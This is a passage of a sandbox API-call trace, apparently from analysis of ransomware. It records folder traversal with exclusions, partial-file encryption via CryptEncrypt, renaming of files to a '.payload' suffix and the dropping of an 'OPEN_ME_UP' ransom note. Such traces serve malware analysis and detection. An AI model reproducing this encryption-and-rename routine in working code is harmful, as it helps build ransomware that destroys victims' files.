hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.390] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.390] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.390] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.390] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.390] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.390] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.390] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 48 [0058.390] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.390] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.390] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.390] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.390] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.390] GetTickCount () returned 0x114f09b [0058.390] GetTickCount () returned 0x114f09b [0058.390] GetTickCount () returned 0x114f09b [0058.390] GetTickCount () returned 0x114f09b [0058.391] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.391] GetProcessHeap () returned 0x5e0000 [0058.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.391] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.393] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.393] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.393] GetProcessHeap () returned 0x5e0000 [0058.393] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.393] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.393] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.393] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.393] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.393] CloseHandle (hObject=0x438) returned 1 [0058.395] GetProcessHeap () returned 0x5e0000 [0058.395] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.395] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.396] GetProcessHeap () returned 0x5e0000 [0058.396] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.396] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.396] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.396] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.396] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.396] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.396] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.396] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 49 [0058.396] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.396] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.396] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.396] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.396] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.396] GetTickCount () returned 0x114f09b [0058.396] GetTickCount () returned 0x114f09b [0058.396] GetTickCount () returned 0x114f09b [0058.396] GetTickCount () returned 0x114f09b [0058.396] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.397] GetProcessHeap () returned 0x5e0000 [0058.397] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.397] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.399] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.399] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.410] GetProcessHeap () returned 0x5e0000 [0058.410] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.410] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.410] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.410] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.410] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.410] CloseHandle (hObject=0x438) returned 1 [0058.470] GetProcessHeap () returned 0x5e0000 [0058.470] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.470] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.471] GetProcessHeap () returned 0x5e0000 [0058.471] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.471] FindClose (in: hFindFile=0x6061e0 | out: hFindFile=0x6061e0) returned 1 [0058.471] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.471] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1029\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.471] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.472] CloseHandle (hObject=0x430) returned 1 [0058.472] GetProcessHeap () returned 0x5e0000 [0058.472] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1030", cAlternateFileName="")) returned 1 [0058.472] lstrcmpiW (lpString1="1030", lpString2="Windows") returned -1 [0058.472] lstrcmpiW (lpString1="1030", lpString2="$Recycle.bin") returned 1 [0058.472] lstrcmpiW (lpString1="1030", lpString2="System Volume Information") returned -1 [0058.472] lstrcmpiW (lpString1="1030", lpString2="Program Files") returned -1 [0058.472] lstrcmpiW (lpString1="1030", lpString2="Program Files (x86)") returned -1 [0058.472] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030") returned 30 [0058.472] lstrcmpW (lpString1="1030", lpString2=".") returned 1 [0058.472] lstrcmpW (lpString1="1030", lpString2="..") returned 1 [0058.472] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.472] GetProcessHeap () returned 0x5e0000 [0058.472] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.472] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\*") returned 32 [0058.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6066e0 [0058.473] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.473] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.473] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.473] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.473] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.473] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\.") returned 32 [0058.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.473] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.473] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.473] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.473] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.473] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.474] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.474] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\..") returned 33 [0058.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.474] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.474] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.474] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.474] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.474] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.474] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.474] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 39 [0058.474] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.474] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.474] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.474] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.474] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.474] GetTickCount () returned 0x114f0e9 [0058.474] GetTickCount () returned 0x114f0e9 [0058.474] GetTickCount () returned 0x114f0e9 [0058.474] GetTickCount () returned 0x114f0e9 [0058.474] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.474] GetProcessHeap () returned 0x5e0000 [0058.474] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.474] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xcf2, lpOverlapped=0x0) returned 1 [0058.477] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff30e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.477] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xcf2, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xcf2, lpOverlapped=0x0) returned 1 [0058.477] GetProcessHeap () returned 0x5e0000 [0058.477] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.477] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.477] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.477] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.477] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.477] CloseHandle (hObject=0x438) returned 1 [0058.478] GetProcessHeap () returned 0x5e0000 [0058.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.478] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.480] GetProcessHeap () returned 0x5e0000 [0058.480] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.480] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.480] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.480] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.481] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.481] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.481] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 48 [0058.481] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.481] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.481] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.481] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.481] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.481] GetTickCount () returned 0x114f0f9 [0058.481] GetTickCount () returned 0x114f0f9 [0058.481] GetTickCount () returned 0x114f0f9 [0058.481] GetTickCount () returned 0x114f0f9 [0058.481] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.481] GetProcessHeap () returned 0x5e0000 [0058.481] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.481] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.483] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.483] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.483] GetProcessHeap () returned 0x5e0000 [0058.483] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.483] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.483] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.484] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.484] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.484] CloseHandle (hObject=0x438) returned 1 [0058.486] GetProcessHeap () returned 0x5e0000 [0058.486] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.486] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), 